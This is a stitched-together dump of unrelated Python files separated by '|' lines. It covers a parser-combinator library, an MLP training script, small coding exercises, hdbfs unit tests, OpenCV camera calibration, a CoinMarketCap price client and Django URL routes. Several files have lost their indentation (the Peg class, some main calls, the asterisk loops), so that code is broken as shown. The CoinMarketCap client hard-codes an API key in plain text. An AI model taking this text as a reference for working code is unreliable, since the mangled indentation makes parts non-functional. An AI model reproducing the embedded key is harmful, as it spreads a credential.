                        Xs.append(np.array(cropped_img, dtype=dt) / 255.)
                        Ys.append(box)
                        count += 1
            Xs, Ys = shuffle(Xs, Ys)
            yield Xs, Ys
|
"""
Exploring making tree parsing central.
"""
import re
# Some derived combinators
# Some derived combinators (built on the primitives defined below)
def invert(p): return cond(p, fail, succeed)      # succeed iff p fails
def either(p, q): return cond(p, p, q)            # ordered choice: p, else q
def both(p, q): return cond(p, q, fail)           # q, but only when p matches
def feed(p, f): return alter(p, lambda *vals: (f(*vals),))  # pipe p's values through f
def maybe(p): return either(p, succeed)           # zero-or-one
def plus(p): return chain(p, star(p))             # one-or-more
def star(p): return recur(lambda p_star: maybe(chain(p, p_star)))  # zero-or-more
def recur(fn):
    # Tie the knot for self-referential grammars: fn receives the very
    # peg it is defining, via a delayed forward reference.
    p = delay(lambda: fn(p))
    return p
# Peg objects
def Peg(x):
if isinstance(x, _Peg): return x
# if isinstance(x, (str, unicode)): return literal(x)
if callable(x): return satisfying(x)
raise ValueError("Not a Peg", x)
class _Peg(object):
def __init__(self, run):
self.run = run
def __call__(self, sequence):
for vals, _ in self.run(sequence):
return vals
return None
def __add__(self, other): return chain(self, Peg(other))
def __radd__(self, other): return chain(Peg(other), self)
def __or__(self, other): return either(self, Peg(other))
def __ror__(self, other): return either(Peg(other), self)
__rshift__ = feed
__invert__ = invert
maybe = maybe
plus = plus
star = star
# Basic combinators
# Basic combinators
nil = ['nil']   # unique sentinel used as the "nothing left" remainder marker
fail = _Peg(lambda s: [])            # never matches
succeed = _Peg(lambda s: [((), s)])  # always matches, produces no values
## anything('hi')
#. ('hi',)
## chain(anything, succeed)('hi')
#. ('hi',)
def cond(p, q, r):
    """If p matches the subject, behave as q; otherwise behave as r."""
    def run(s):
        pv = p.run(s)
        choice = q if pv else r
        if choice is p: return pv # (an optimization)
        else: return choice.run(s)
    return _Peg(run)
def satisfying(ok):
    "Eat a subject s when ok(s), producing (s,)."
    return _Peg(lambda s: [((s,), nil)] if s is not nil and ok(s) else [])
def chain(p, q):
    """Match p, then q on p's leftover, concatenating their value tuples."""
    return _Peg(lambda s: [(pvals + qvals, qnub)
                           for pvals, pnub in p.run(s)
                           for qvals, qnub in q.run(pnub)])
def alter(p, f):
    """Transform p's values with f; f must return the new value tuple."""
    return _Peg(lambda s: [(f(*vals), nub)
                           for vals, nub in p.run(s)])
def delay(thunk):
    """Forward reference: resolve thunk() to a peg on first use."""
    def run(s):
        # Memoize: later calls go straight to the resolved peg's run.
        q.run = Peg(thunk()).run
        return q.run(s)
    q = _Peg(run)
    return q
def item(p):
    "Eat the first item of a sequence, iff p matches it."
    def run(s):
        if s is nil: return []
        # Non-indexable or empty subjects simply fail to match.
        try: first = s[0]
        except IndexError: return []
        except TypeError: return []
        except KeyError: return []
        return [(vals, s[1:]) for vals, _ in p.run(first)]
    return _Peg(run)
def match(regex, flags=0):
    """Match a regex at the start of a string subject, producing its groups."""
    compiled = re.compile(regex, flags)
    return _Peg(lambda s:
                [] if s is nil
                else [(m.groups(), s[m.end():])
                      for m in [compiled.match(s)] if m])
def capture(p):
    """Produce, as a single value, the exact slice of the subject p consumed."""
    def run(s):
        for vals, nub in p.run(s):
            # XXX use the position change instead, once we're tracking that:
            if s is not nil and nub is not nil:
                i = len(s) - len(nub)
                if s[i:] == nub:
                    return [((s[:i],), nub)]
                raise Exception("Bad capture")
        return []
    return _Peg(run)
## capture(match('h..') + match('.'))('hi there')
#. ('hi t',)
## capture(item(anything) + item(anything))([3])
## capture(item(anything) + item(anything))([3, 1])
#. ([3, 1],)
# More derived combinators
## startswith('hi')('hi there')
#. ()
def startswith(s): return match(re.escape(s))            # literal string prefix
anything = satisfying(lambda s: True)                    # matches any subject
def literal(c): return drop(satisfying(lambda s: c == s))  # match c, keep no values
def drop(p): return alter(p, lambda *vals: ())           # discard p's values
end = invert(item(anything)) # Hmmm
def an_instance(type_):
    """Match any subject that is an instance of type_."""
    return satisfying(lambda x: isinstance(x, type_))
def alt(*ps):
    """Ordered choice over any number of pegs (fails when given none)."""
    if not ps: return fail
    if not ps[1:]: return ps[0]
    return either(ps[0], alt(*ps[1:]))
def items(*ps):
    """Match a sequence item-by-item against ps, then require the end."""
    if not ps: return end
    return chain(item(ps[0]), items(*ps[1:]))
def seq(*ps):
    """Chain any number of pegs in order (succeeds when given none)."""
    if not ps: return succeed
    return chain(ps[0], seq(*ps[1:]))
give = lambda c: feed(succeed, lambda: c)  # always produce the constant c
# Examples
from operator import *
## fail(42)
## anything(42)
#. (42,)
## chain(item(literal(5)), item(literal(0)))([5, 0, 2])
#. ()
## an_instance(int)(42)
#. (42,)
# A tiny prefix calculator over nested lists, e.g. ['+', ['-', 2, 1], 3].
calc = delay(lambda:
    alt(feed(items(literal('+'), calc, calc), add),
        feed(items(literal('-'), calc, calc), sub),
        an_instance(int)))
## calc(42)
#. (42,)
## calc(['-', 3, 1])
#. (2,)
## calc(['+', ['-', 2, 1], 3])
#. (4,)
singleton = lambda v: (v,)           # wrap a value in a 1-tuple
cat = lambda *lists: sum(lists, ())  # concatenate tuples
# Flatten nested '+'-trees into a flat tuple of ints.
flatten1 = delay(lambda:
    alt(seq(item(literal('+')), star(item(flatten1)), end),
        an_instance(int)))
## flatten1(['+', ['+', ['+', 1, ['+', 2]]]])
#. (1, 2)
## flatten1(42)
#. (42,)
## flatten1(['+'])
#. ()
## flatten1(['+', 42])
#. (42,)
## flatten1(['+', 42, 43])
#. (42, 43)
## chain(item(literal('+')), anything)(['+', 42])
#. ([42],)
## star(item(anything))([1,2,3])
#. (1, 2, 3)
## star(match('hi() '))('hi hi hi there')
#. ('', '', '')
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Created By Liang Jun Copyright owned
import sys,os
import cv2 as cv
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn import svm
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
from sklearn.model_selection import train_test_split
import pickle
def predictForData(model, targetData, labels):
    """Score *model* on (targetData, labels).

    Returns a (precision, recall, fscore, accuracy) tuple; the first
    three are macro-averaged over classes.
    """
    y_pred = model.predict(targetData)
    accuracy = model.score(targetData, labels)
    # The confusion matrix previously computed here (`Cm`) was never used.
    precision, recall, fscore, _support = precision_recall_fscore_support(labels, y_pred, average='macro')
    # print("precision %f recall %f fscore %f"%(precision,recall,fscore));
    return precision, recall, fscore, accuracy
def readTrainFile(fileName):
    """Parse a comma-separated numeric training file into a 2-D numpy array.

    Every line longer than one character becomes one row of floats.
    """
    # `with` closes the handle even on a read error; the original also
    # shadowed the (Python 2) builtin `file`.
    with open(fileName, "r") as srcFile:
        srcString = srcFile.read()
    matrix = []
    for line in srcString.split("\n"):
        if (len(line)>1):
            matrix.append([float(num) for num in line.split(",")])
    return np.array(matrix)
def saveModel(model, fileFormat,
              modelDir=r'C:\Users\kitrol\Desktop\MachineLearning\models'):
    """Pickle *model* to <modelDir>/model_<fileFormat>.pickle, overwriting any
    existing file.

    `modelDir` defaults to the original hard-coded location for backward
    compatibility; pass a directory to store models elsewhere.
    """
    fileName = os.path.join(modelDir, 'model_%s.pickle' % fileFormat)
    if os.path.isfile(fileName):
        os.remove(fileName)
    with open(fileName, 'wb') as modelFile:
        pickle.dump(model, modelFile)
def main(argv):
    """Train an MLP classifier on the CSV passed as argv[1] and pickle the model."""
    if len(argv) < 2:
        usage="Usage: \n 1 Parameters are needed:\n train **.csv file needed "
        print(usage);
        return False;
    randomSeed = 123123;
    fileName = argv[1];
    trainData = readTrainFile(fileName);
    # last column is the ground-truth label; the rest are features
    features = trainData[:,:-1];
    truth = trainData[:,-1];
    hidden_units = features.shape[1];#features for one node
    # NOTE(review): test_size=0.7 leaves only 30% of the rows for training --
    # confirm this split is intentional.
    X_train, X_test, y_train, y_test = train_test_split(features, truth, test_size=0.7, random_state=randomSeed);
    # five hidden layers, each as wide as the feature count
    hidden_layers = (hidden_units,hidden_units,hidden_units,hidden_units,hidden_units,);
    clf = MLPClassifier(activation='relu', alpha=1e-05, batch_size='auto',
                        beta_1=0.9, beta_2=0.999, early_stopping=False,
                        epsilon=1e-08, hidden_layer_sizes=hidden_layers, learning_rate='invscaling', #(20,20,20,20,10,5)
                        learning_rate_init=0.001, max_iter=2000,
                        nesterovs_momentum=True, power_t=0.5, random_state=1, shuffle=True,
                        solver='adam', tol=0.00001, validation_fraction=0.2, verbose=False,
                        warm_start=False)
    clf.fit(X_train, y_train);
    precision_train,recall_train,fscore_train,accuracy_train = predictForData(clf,X_train,y_train);
    precision_test,recall_test,fscore_test,accuracy_test =predictForData(clf,X_test,y_test);
    # print("precision %f,%f,%f\n"%(precision_train,precision_cv,precision_test));
    # print("recall %f,%f,%f\n"%(recall_train,recall_cv,recall_test));
    print("fscore %f,%f\n"%(fscore_train,fscore_test));
    print("accuracy %f,%f\n"%(accuracy_train,accuracy_test));
    # print(features.shape);
    # features.shape[0] : m train data
    # features.shape[1] : n features for one data (bias item included)
    # trained model write to file
    saveModel(clf,os.path.basename(fileName).split('.')[0]);
if __name__ == '__main__':
main(sys.argv) |
# Prompt the user for the name of a new text file to create, open it,
# then ask for content and write that content into the file.
a='txt'
n=input('名称:')
c=[n,a]
# join name and extension with a dot, e.g. "notes" -> "notes.txt"
n='.'.join(c)
with open(n,'w+')as n_file:
    # NOTE(review): rebinding n_file to write()'s return value (a char count)
    # is harmless here but pointless -- presumably unintentional.
    n_file=n_file.write(input('内容:'))
|
# Break an amount of money (0 .. 1,000,000.00) into Brazilian bills and coins.
N = float(input())
#N = 576.73
#N = 4
#N = 91.01
if (0 <= N <= 1000000.00):
    NOTAS = [100, 50, 20, 10, 5, 2]
    print("NOTAS:") # must match the problem's expected output exactly
    for i in range(len(NOTAS)):
        qtd_nota = int(N / NOTAS[i]) # amount divided by the current bill value = count of this bill
        print(qtd_nota,"nota(s) de R$", "{:.2f}".format(NOTAS[i]) )
        # subtract the value of the bills dispensed above
        N -= qtd_nota * NOTAS[i]
    # the same reasoning applies to the coins
    MOEDAS = [1, 0.5, 0.25, 0.10, 0.05, 0.01]
    print("MOEDAS:")
    #print("%.2f"%N)
    for i in range(len(MOEDAS)):
        qtd_nota = int(N / MOEDAS[i]) # amount divided by the current coin value = count of this coin
        print(qtd_nota,'moeda(s) de R$', "{:.2f}".format(MOEDAS[i]))
        # subtract the value of the coins dispensed above
        N -= qtd_nota * MOEDAS[i]
        # round each step to dodge binary floating-point accumulation errors
        N = round(N,2)
    # NOTE(review): the next line is a no-op -- the formatted string is discarded.
    "{:.2f}".format(5)
else:
    print("dinheiro invalido, ta dando certo nao carai, tenta de novo ai")
|
import unittest
import testutil
import subprocess
import shutil
import os
import hdbfs
class InsertCases( testutil.TestCase ):
    """Integration tests for scripts/insertfile.py.

    Each test shells out to the insert script against a scratch environment
    (created by testutil.TestCase.init_env) and then inspects the resulting
    hdbfs database.  NOTE: uses Python 2 iterator protocol (it.next()).
    """

    def setUp( self ):
        self.init_env()

    def tearDown( self ):
        self.uninit_env()

    # NOTE(review): mutable default arguments (taglist = [], newtags = [])
    # are shared across calls; harmless here because they are never mutated,
    # but worth fixing.
    def _run( self, files, album = None, text = None, taglist = [],
              newtags = [], recover = None, name = None ):
        # Build the insertfile.py command line from the keyword options and
        # run it, raising on a non-zero exit status.
        cmd = [ 'python', 'scripts/insertfile.py', '-c', self.cfg_file_path ]
        if( album is not None ):
            cmd.append( '-a' )
            # empty string means "album with no name" -> '-' sentinel
            if( len( album ) == 0 ):
                cmd.append( '-' )
            else:
                cmd.append( album )
        if( text is not None ):
            cmd.append( '-x' )
            cmd.append( text )
        if( len( taglist ) > 0 ):
            tags = ','.join( taglist )
            cmd.append( '-t' )
            cmd.append( tags )
        if( len( newtags ) > 0 ):
            tags = ','.join( newtags )
            cmd.append( '-T' )
            cmd.append( tags )
        if( recover is not None ):
            cmd.append( '-r' )
        if( name is not None ):
            cmd.append( '-n' )
            cmd.append( name )
        if( isinstance( files, str ) ):
            cmd.append( files )
        else:
            cmd.extend( files )
        subprocess.check_call( cmd )

    def test_add( self ):
        # A plain insert consumes the source file and registers it in the DB.
        black = self._load_data( self.black )
        self._run( black )
        self.assertFalse( os.path.exists( black ),
                          'Old image was not removed' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )

    def test_double_add( self ):
        # Re-inserting an already-present image leaves the duplicate on disk.
        black = self._load_data( self.black )
        self._run( black )
        self.assertFalse( os.path.exists( black ),
                          'Old image was not removed' )
        black = self._load_data( self.black )
        self._run( black )
        self.assertTrue( os.path.exists( black ),
                         'Double image was removed' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )

    def test_recover_not_in_db( self ):
        # Recovery mode never adds new objects; the file stays put.
        black = self._load_data( self.black )
        self._run( black, recover = True )
        self.assertTrue( os.path.exists( black ),
                         'Image was removed' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertTrue( obj is None,
                         'Image in DB' )

    def test_recover_ok_file( self ):
        black = self._load_data( self.black )
        self._run( black )
        self.assertFalse( os.path.exists( black ),
                          'Old image was not removed' )
        black = self._load_data( self.black )
        self._run( black, recover = True )
        self.assertTrue( os.path.exists( black ),
                         'Recovery image was removed' )

    def test_recover_missing_file( self ):
        # Delete the stored stream, then recover it from a fresh copy on disk.
        black = self._load_data( self.black )
        self._run( black )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        s = obj.get_root_stream()
        h.imgdb.delete( s.get_stream_id(),
                        s.get_priority(),
                        s.get_extension() )
        h.imgdb.commit()
        img_fd = obj.get_root_stream().read()
        self.assertFalse( img_fd is not None,
                          'Remove failed' )
        black = self._load_data( self.black )
        self._run( black, recover = True )
        self.assertTrue( self._diff_data( obj.get_root_stream().read(), self.black ),
                         'Image not recovered' )
        self.assertFalse( os.path.exists( black ),
                          'Recovery image was not removed' )

    def test_no_name( self ):
        # name='noset' suppresses recording the origin file name.
        black = self._load_data( self.black )
        self._run( black, name = 'noset' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        self.assertTrue( obj.get_name() is None,
                         'Name loaded' )

    def test_name( self ):
        black = self._load_data( self.black )
        self._run( black )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        self.assertEqual( obj.get_name(), self.black,
                          'Name not loaded' )

    def test_name2( self ):
        black = self._load_data( self.black )
        self._run( black, name = 'setundef' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        self.assertEqual( obj.get_name(), self.black,
                          'Name not loaded' )

    def test_different_names( self ):
        # Inserting identical data under two names records both origin names.
        black = self._load_data( self.black )
        self._run( black )
        black2 = self._load_data( self.black, 'altname.png' )
        self._run( black2 )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        names = obj.get_origin_names()
        self.assertTrue( self.black in names,
                         'First name not loaded' )
        self.assertTrue( 'altname.png' in names,
                         'Second name not loaded' )
        self.assertEqual( len( names ), 2,
                          'Name count does not match' )

    def test_load_name( self ):
        black = self._load_data( self.black )
        self._run( black, name = 'noset' )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertFalse( obj is None,
                          'Image not in DB' )
        self.assertTrue( obj.get_name() is None,
                         'Name loaded when it shouldn\'t have been' )
        h.close()
        black = self._load_data( self.black )
        self._run( black )
        h = hdbfs.Database()
        obj = h.get_object_by_id( 1 )
        self.assertEqual( obj.get_name(), self.black,
                          'name not loaded' )

    def test_tag_file( self ):
        h = hdbfs.Database()
        h.enable_write_access()
        tag = h.make_tag( 'black' )
        files = tag.get_files()
        self.assertEqual( len( files ), 0,
                          'Unexpected number of files' )
        h.close()
        black = self._load_data( self.black )
        self._run( black, taglist = [ 'black' ] )
        h = hdbfs.Database()
        tag = h.get_tag( 'black' )
        files = tag.get_files()
        self.assertEqual( len( files ), 1,
                          'Unexpected number of files' )

    def test_create_tag( self ):
        # -T creates the tag if it does not exist yet.
        h = hdbfs.Database()
        black = self._load_data( self.black )
        self._run( black, newtags = [ 'black' ] )
        h = hdbfs.Database()
        try:
            tag = h.get_tag( 'black' )
        except KeyError:
            self.fail( 'Failed creating tag' )
        except StopIteration:
            pass
        files = tag.get_files()
        self.assertEqual( len( files ), 1,
                          'Unexpected number of files' )

    def test_tag_multi_file( self ):
        # Three files x two tags each; verify both directions of the mapping.
        h = hdbfs.Database()
        h.enable_write_access()
        h.make_tag( 'magenta' )
        h.make_tag( 'yellow' )
        h.make_tag( 'cyan' )
        h.close()
        red = self._load_data( self.red )
        green = self._load_data( self.green )
        blue = self._load_data( self.blue )
        self._run( red, taglist = [ 'magenta', 'yellow' ] )
        self._run( green, taglist = [ 'yellow', 'cyan' ] )
        self._run( blue, taglist = [ 'magenta', 'cyan' ] )
        h = hdbfs.Database()
        mt = h.get_tag( 'magenta' )
        yt = h.get_tag( 'yellow' )
        ct = h.get_tag( 'cyan' )
        # ids 1-3 are the tags created above, so the files start at id 4
        ro = h.get_object_by_id( 4 )
        go = h.get_object_by_id( 5 )
        bo = h.get_object_by_id( 6 )
        magenta = mt.get_files()
        yellow = yt.get_files()
        cyan = ct.get_files()
        self.assertEqual( len( magenta ), 2,
                          'Unexpected number of files (magenta)' )
        self.assertEqual( len( yellow ), 2,
                          'Unexpected number of files (yellow)' )
        self.assertEqual( len( cyan ), 2,
                          'Unexpected number of files (cyan)' )
        self.assertTrue( ro in magenta,
                         'Red not in magenta' )
        self.assertTrue( bo in magenta,
                         'Blue not in magenta' )
        self.assertTrue( ro in yellow,
                         'Red not in yellow' )
        self.assertTrue( go in yellow,
                         'Green not in yellow' )
        self.assertTrue( go in cyan,
                         'Green not in cyan' )
        self.assertTrue( bo in cyan,
                         'Blue not in cyan' )
        red_in = ro.get_tags()
        green_in = go.get_tags()
        blue_in = bo.get_tags()
        self.assertEqual( len( red_in ), 2,
                          'Unexpected number of tags (red)' )
        self.assertEqual( len( green_in ), 2,
                          'Unexpected number of tags (green)' )
        self.assertEqual( len( blue_in ), 2,
                          'Unexpected number of tags (blue)' )
        self.assertTrue( mt in red_in,
                         'Red does not have magenta' )
        self.assertTrue( yt in red_in,
                         'Red does not have yellow' )
        self.assertTrue( yt in green_in,
                         'Green does not have yellow' )
        self.assertTrue( ct in green_in,
                         'Green does not have cyan' )
        self.assertTrue( mt in blue_in,
                         'Blue does not have magenta' )
        self.assertTrue( ct in blue_in,
                         'Blue does not have cyan' )

    def test_make_album( self ):
        # -a groups the inserted files under a new album object (id 1 here).
        white = self._load_data( self.white )
        grey = self._load_data( self.grey )
        black = self._load_data( self.black )
        self._run( [ white, grey, black ], album = 'bw' )
        h = hdbfs.Database()
        al = h.get_object_by_id( 1 )
        wo = h.get_object_by_id( 2 )
        lo = h.get_object_by_id( 3 )
        ko = h.get_object_by_id( 4 )
        self.assertTrue( isinstance( al, hdbfs.Album ),
                         'Expected album' )
        files = al.get_files()
        self.assertTrue( wo in files,
                         'White not in album' )
        self.assertTrue( lo in files,
                         'Grey not in album' )
        self.assertTrue( ko in files,
                         'Black not in album' )

    def test_tag_album( self ):
        # Tagging an album insertion tags the album itself, not its members.
        h = hdbfs.Database()
        h.enable_write_access()
        tag = h.make_tag( 'bw' )
        h.close()
        white = self._load_data( self.white )
        grey = self._load_data( self.grey )
        black = self._load_data( self.black )
        self._run( [ white, grey, black ], album = 'bw', taglist = [ 'bw' ] )
        h = hdbfs.Database()
        al = h.get_object_by_id( 2 )
        wo = h.get_object_by_id( 3 )
        lo = h.get_object_by_id( 4 )
        ko = h.get_object_by_id( 5 )
        self.assertTrue( isinstance( al, hdbfs.Album ),
                         'Expected album' )
        query = hdbfs.query.Query()
        query.add_require_constraint( hdbfs.query.TagConstraint( 'bw' ) )
        it = query.execute( h ).__iter__()
        self.assertEqual( it.next(), al,
                          'Unexpected tagged item' )
        try:
            it.next()
            self.fail( 'Unexpected tagged item' )
        except StopIteration:
            pass

    def test_album_text( self ):
        # -x attaches the (first 256 bytes of the) text file to the album.
        white = self._load_data( self.white )
        grey = self._load_data( self.grey )
        black = self._load_data( self.black )
        bw_desc = self._load_data( self.bw_desc )
        self._run( [ white, grey, black ], album = 'bw', text = bw_desc )
        h = hdbfs.Database()
        query = hdbfs.query.Query()
        query.set_type( hdbfs.TYPE_ALBUM )
        al = query.execute( h ).__iter__().next()
        self.assertTrue( isinstance( al, hdbfs.Album ),
                         'Expected album' )
        textf = open( bw_desc, 'r' )
        text = textf.read( 256 )
        textf.close()
        self.assertEqual( text, al.get_text(),
                          'Text not loaded' )
# Run the insert-file integration tests when executed directly.
if( __name__ == '__main__' ):
    unittest.main()
|
# Find the maximum-perimeter non-degenerate triangle among n stick lengths.
n = int(input())
A = sorted(int(i) for i in input().split())
# Scan downward from the largest triple: in sorted order, the two sticks just
# below A[i+2] are the best candidates to satisfy the triangle inequality.
i = n - 3
while i >= 0 and (A[i] + A[i + 1] <= A[i + 2]):
    i -= 1
if i >= 0:
    print(A[i], A[i + 1], A[i + 2])
else:
    print(-1)
|
# Day 3: Toboggan Trajectory
# <ryc> 2021
def inputdata( ):
    """Read the puzzle input, returning a list of lines with the final character
    (the newline) sliced off each line."""
    with open( 'day_03_2020.input' ) as stream:
        return [ line[ : -1 ] for line in stream ]
def toboggan( data, delta_x, delta_y ):
    """Count '#' cells hit while sledding (delta_x, delta_y) per step.

    The map repeats horizontally, so the column wraps modulo the row width.
    The starting cell (0, 0) is never counted.
    """
    width = len( data[ 0 ] )
    height = len( data )
    hits = 0
    col = 0
    # visit every delta_y-th row below the start, wrapping the column
    for row in range( delta_y, height, delta_y ):
        col = ( col + delta_x ) % width
        if data[ row ][ col ] == '#':
            hits += 1
    return hits
if __name__ == '__main__':
    print( '\nDay 3: Toboggan Trajectory' )
    data = inputdata( )
    # part 2: multiply the tree counts of the five prescribed slopes
    scopes = ( ( 1, 1 ), ( 3, 1 ), ( 5, 1 ), ( 7, 1 ), ( 1, 2 ) )
    total = 1
    for ( right, down ) in scopes:
        tree = toboggan( data, right, down )
        total *= tree
        print( f'\nToboggan right = { right } down = { down } : { tree }' )
    print( "\nTotal =", total )
|
from ._visible import VisibleValidator
from ._valuessrc import ValuessrcValidator
from ._values import ValuesValidator
from ._ticktextsrc import TicktextsrcValidator
from ._ticktext import TicktextValidator
from ._label import LabelValidator
from ._displayindex import DisplayindexValidator
from ._categoryorder import CategoryorderValidator
from ._categoryarraysrc import CategoryarraysrcValidator
from ._categoryarray import CategoryarrayValidator
|
class Persona:
    """A person that reports how it moves (polymorphism demo)."""

    def __init__(self, nombre):
        self.nombre = nombre

    def avanza(self):
        # base behaviour: walking (overridden by subclasses)
        print('ando caminando')
class Ciclista(Persona):
    """A cyclist: same interface as Persona, different avanza() message."""

    def __init__(self, nombre):
        super().__init__(nombre)

    def avanza(self):
        # polymorphic override of Persona.avanza
        print('estoy conduciendo mi bicla')
def main():
    """Entry point: exercise the polymorphic avanza() on both classes."""
    caminante = Persona('David')
    caminante.avanza()
    rider = Ciclista('Daniel')
    rider.avanza()
if __name__ =='__main__':
main() |
import cv2
import numpy as np
from find_chessboard import find_chessboard
def visualize_distortion(camera_matrix, dist_coefs, (width, height), alpha=0.0):
    # Render a synthetic 10-px grid and undistort it so the lens model can be
    # inspected visually at the given free-scaling parameter alpha.
    # NOTE: tuple unpacking in the signature is Python 2 only syntax.
    camera_matrix, _ = cv2.getOptimalNewCameraMatrix(camera_matrix, dist_coefs,
                                                     (width, height), alpha)
    # white canvas
    img = np.ones((height, width), dtype=np.uint8) * 255
    # horizontal then vertical grid lines every 10 pixels
    for y in range(0, height, 10):
        cv2.line(img, (0, y), (width - 1, y), (0, 0, 0))
    for x in range(0, width, 10):
        cv2.line(img, (x, 0), (x, height - 1), (0, 0, 0))
    img = cv2.undistort(img, camera_matrix, dist_coefs)
    cv2.imshow("Distortion with alpha="+str(alpha), img)
if __name__ == '__main__':
    # Calibrate from chessboard images, then demonstrate three equivalent ways
    # of reprojecting the calibration points.  (Python 2 print statements.)
    obj_points = []
    img_points = []
    for i in range(1,3):
        img = cv2.imread("../images/chessboard%i.jpg" % i)
        h,w = img.shape[:2]
        found, result_img, pattern_points, corner_points = find_chessboard(img, square_size=0.05, pattern_size=(9, 6))
        if found:
            obj_points.append(pattern_points)
            img_points.append(corner_points)
    # NOTE(review): this 3-argument calibrateCamera call matches an old cv2
    # API; modern OpenCV requires cameraMatrix/distCoeffs arguments -- confirm
    # the OpenCV version in use.
    rms, camera_matrix, dist_coefs, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, (w, h))
    print "RMS:", rms
    print "camera matrix:\n", camera_matrix
    print "distortion coefficients: ", dist_coefs
    print
    h,w = img.shape[:2]
    visualize_distortion(camera_matrix, dist_coefs, (w, h), alpha=0.0)
    visualize_distortion(camera_matrix, dist_coefs, (w, h), alpha=1.0)
    #
    # Now some undistort methods for the last image
    #
    # undistort the last image
    distorted_img = img
    img_points = img_points[-1]
    obj_points = obj_points[-1]
    rvec = rvecs[-1]
    tvec = tvecs[-1]
    opt_camera_matrix, _ = cv2.getOptimalNewCameraMatrix(camera_matrix, dist_coefs, (w, h), alpha=0)
    undistorted_img = cv2.undistort(distorted_img, opt_camera_matrix, dist_coefs)
    # version 1, using world coordinates, distorted image, calibrated camera matrix and distortion coefficients
    points, _ = cv2.projectPoints(obj_points, rvec, tvec, camera_matrix, dist_coefs)
    for point in points:
        point = np.rint(point.flatten()).astype(int)
        red_color = (0, 0, 255)
        cv2.circle(distorted_img, tuple(point), 2, red_color, -1)
    # version 2, using world coordinates, undistorted image, calibrated camera matrix and empty distortion coefficients
    empty_dist_coefs = np.array([[0.0, 0.0, 0.0, 0.0, 0.0]])
    points, _ = cv2.projectPoints(obj_points, rvec, tvec, camera_matrix, empty_dist_coefs)
    for point in points:
        point = np.rint(point.flatten()).astype(int)
        blue_color = (255, 0, 0)
        cv2.circle(undistorted_img, tuple(point), 2, blue_color, -1)
    # version 3, using image coordinates, undistorted image, calibrated camera matrix and distortion coefficients
    for point in img_points:
        point = cv2.undistortPoints(np.array([[point]]), camera_matrix, dist_coefs, P=camera_matrix)
        point = np.rint(point.flatten()).astype(int)
        green_color = (0, 255, 0)
        cv2.circle(undistorted_img, tuple(point), 2, green_color, -1)
    cv2.imshow('Distorted Image', distorted_img)
    cv2.imshow('Undistorted Image', undistorted_img)
    cv2.waitKey(0)
cv2.destroyAllWindows() |
from requests import Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
class CoinMarketCap:
    # Thin client for the CoinMarketCap v1 "quotes/latest" endpoint.
    def __init__(self):
        self.url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
        self.headers = {
            'Accepts': 'application/json',
            'X-CMC_PRO_API_KEY': 'b277b774-a848-4d0d-87a6-86540d03e015', # free key anyways
        }
    def get_price(self, coin):
        # Return the latest USD price for `coin` (a ticker symbol like 'BTC'),
        # or implicitly None when the request fails at the connection level.
        # NOTE(review): KeyError/ValueError from a malformed response body is
        # NOT caught and will propagate to the caller.
        parameters = {
            'symbol': coin,
        }
        session = Session()
        session.headers.update(self.headers)
        try:
            response = session.get(self.url, params=parameters)
            data = json.loads(response.text)
            price = data['data'][coin]['quote']['USD']['price']
            return price
        except (ConnectionError, Timeout, TooManyRedirects) as e:
            print(e)
"""
Faça um programa que receba um inteiro positivo e imprima a seguinte sequência
de asteriscos de acordo com o numero recebido.
Exemplo:
Entrada: 5
Saída:
*
* *
* * *
* * * *
* * * * *
Entrada: 9
saída:
*
* *
* * *
* * * *
* * * * *
* * * * * *
* * * * * * *
* * * * * * * *
* * * * * * * * *
"""
linhas = int(input("Digite o numero de linhas do padrão: "))
for i in range(linhas):
for j in range(linhas):
if i >= j:
print("* ", end="")#o parâmetro 'end=""' faz com que não haja quebra de linha
else:
print(" ", end="")
print("")
|
import wx
class MCPPackageBase(wx.EvtHandler):
    """Base class for MCP protocol packages.

    Holds the negotiation state shared by all packages; concrete packages
    override the Initialize / mcp_negotiate_end hooks.
    """

    def __init__(self, mcp):
        wx.EvtHandler.__init__(self)
        self.mcp = mcp
        # negotiation / dispatch state, unset until the package is activated
        self.activated = None
        self.callback = None
        self.max = 0.0
        self.min = 0.0
        self.message = ''
        self.package = ''

    def Initialize(self):
        """Hook run after construction; default does nothing."""
        pass

    def mcp_negotiate_end(self):
        """Hook run when MCP negotiation finishes; default does nothing."""
        pass
|
from django.conf.urls import include, url
from djofx import views
# Top-level djofx URL routes; sub-areas are delegated to included urlconfs.
urlpatterns = [
    url(r'^$', views.home_page, name="djofx_home"),
    url(r'^upload/$', views.upload_ofx_file, name="djofx_upload"),
    url(r'^account/', include('djofx.urls.account')),
    url(r'^categories/', include('djofx.urls.categories')),
    url(r'^monthly/', include('djofx.urls.monthly')),
    url(r'^transaction/', include('djofx.urls.transaction')),
    # NOTE(review): passing a dotted-string view was removed in Django 1.10+;
    # confirm the project's Django version or import the view callable.
    url(r'^jsreverse/$', 'django_js_reverse.views.urls_js', name='js_reverse'),
]
|
import pandas
from sklearn import linear_model
import csv
# Leftover scaffolding from a cars.csv example, kept commented out:
# with open('cars.csv', 'w', newline='') as csvfile:
#     fieldnames = ['Weight', 'Volume', 'price']
#     writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
#
#     writer.writeheader()
#     writer.writerow({'Volume': 2300 , 'Weight': 1300, 'price': 20})
df = pandas.read_csv("ctest.csv")
#
